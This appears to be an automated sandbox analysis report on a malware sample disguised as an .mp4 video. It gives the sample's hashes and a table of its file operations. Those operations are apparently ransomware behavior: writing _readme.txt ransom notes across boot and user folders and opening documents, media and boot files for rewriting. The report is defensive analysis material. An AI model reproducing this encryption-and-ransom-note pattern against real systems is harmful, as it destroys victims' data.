C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\y3s8jy4WEuwL8.mp4	69.27 KB	MD5: b950010153a6dca641ed06961727f926 SHA1: 810a929efa4516d4fb76899d6826d03898a5eb38 SHA256: 90c04f1e2197ac6ad7c366cd0d002e4b30555972eaca20ced2c155a7cefbab73 SSDeep: 1536:TvO1jM5McOPm2VVSTFS2Tx4MTvzc6g7c4EVELaFuY:TJgUg2CMT7WVEWLap	... File Actions Show Properties Download

Host Behavior

File (1738)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\SystemID\PersonalID.txt	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\SystemID\PersonalID.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\Boot\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Config.Msi\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\cs-CZ\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\da-DK\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\de-DE\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\el-GR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\en-US\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\es-ES\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\fi-FI\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\Fonts\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\fr-FR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\hu-HU\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\it-IT\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ja-JP\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ko-KR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\nb-NO\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\nl-NL\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pl-PL\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pt-BR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\pt-PT\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\ru-RU\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\sv-SE\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\tr-TR\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-CN\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-HK\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Boot\zh-TW\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	2	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\_readme.txt	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE	1	Fn
Create	C:\BOOTSECT.BAK	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BCD.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\BOOTSTAT.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\memtest.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\cs-CZ\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\da-DK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\de-DE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\el-GR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\en-US\memtest.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\es-ES\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fi-FI\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\chs_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\cht_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\jpn_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\kor_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\Fonts\wgl4_boot.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\fr-FR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\hu-HU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\it-IT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ja-JP\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ko-KR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\nb-NO\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\nl-NL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pl-PL\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pt-BR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\pt-PT\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\ru-RU\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\sv-SE\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\tr-TR\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-CN\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-HK\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Boot\zh-TW\bootmgr.exe.mui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
